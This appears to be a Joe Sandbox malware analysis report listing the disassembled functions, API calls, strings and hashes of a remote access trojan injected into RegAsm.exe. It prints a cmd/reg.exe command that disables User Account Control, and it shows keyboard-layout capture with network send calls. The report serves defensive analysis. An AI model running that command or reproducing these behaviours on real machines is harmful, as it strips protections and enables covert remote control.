                                                  • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                  • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                  Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                  • String ID: 0$MsgWindowClass
                                                  • API String ID: 2877667751-2410386613
                                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                  Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                                  Strings
                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreateProcess
                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                  • API String ID: 2922976086-4183131282
                                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                  Function 0040729B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                  • SG, xrefs: 00407715
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  • API String ID: 0-643455097
                                                  • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                  • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                  • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                  • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                  Function 004433DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                  • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                  Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                  • CloseHandle.KERNEL32(?), ref: 00405140
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                  • String ID: KeepAlive | Disabled
                                                  • API String ID: 2993684571-305739064
                                                  • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                  • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                  Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                  • String ID: Alarm triggered
                                                  • API String ID: 614609389-2816303416
                                                  • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                  • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                  Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                  • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                  Strings
                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                  • API String ID: 3024135584-2418719853
                                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                  Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                  • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                  Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                  • _free.LIBCMT ref: 0044943D
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00449609
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID:
                                                  • API String ID: 1286116820-0
                                                  • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                  • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                  • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                  • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                  Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 4269425633-0
                                                  • Opcode ID: 17d3ca1aae57d35aa737fa1fa062f2e108f84d872e45db2d654924eee4b7dbd7
                                                  • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                  • Opcode Fuzzy Hash: 17d3ca1aae57d35aa737fa1fa062f2e108f84d872e45db2d654924eee4b7dbd7
                                                  • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                  Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                  Function 004511AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                  • __freea.LIBCMT ref: 0045129D
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 313313983-0
                                                  • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                  • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                  Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                  • _free.LIBCMT ref: 0044F43F
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                  • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                  Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                  • _free.LIBCMT ref: 00448353
                                                  • _free.LIBCMT ref: 0044837A
                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                  • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                  Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00450A54
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450A66
                                                  • _free.LIBCMT ref: 00450A78
                                                  • _free.LIBCMT ref: 00450A8A
                                                  • _free.LIBCMT ref: 00450A9C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                  Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00444106
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00444118
                                                  • _free.LIBCMT ref: 0044412B
                                                  • _free.LIBCMT ref: 0044413C
                                                  • _free.LIBCMT ref: 0044414D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                  Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strpbrk.LIBCMT ref: 0044E7B8
                                                  • _free.LIBCMT ref: 0044E8D5
                                                    • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                    • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                    • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                  • String ID: *?$.
                                                  • API String ID: 2812119850-3972193922
                                                  • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                  • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                  • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                  • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                  Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                    • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                  • String ID: XQG$NG$PG
                                                  • API String ID: 1634807452-3565412412
                                                  • Opcode ID: 1a5fd847aa4613be726e0b07c87a77b1a8056118332b07185b6a298163ead988
                                                  • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                  • Opcode Fuzzy Hash: 1a5fd847aa4613be726e0b07c87a77b1a8056118332b07185b6a298163ead988
                                                  • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                  Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                  • _free.LIBCMT ref: 004435E0
                                                  • _free.LIBCMT ref: 004435EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  • API String ID: 2506810119-1068371695
                                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                  Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636D1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
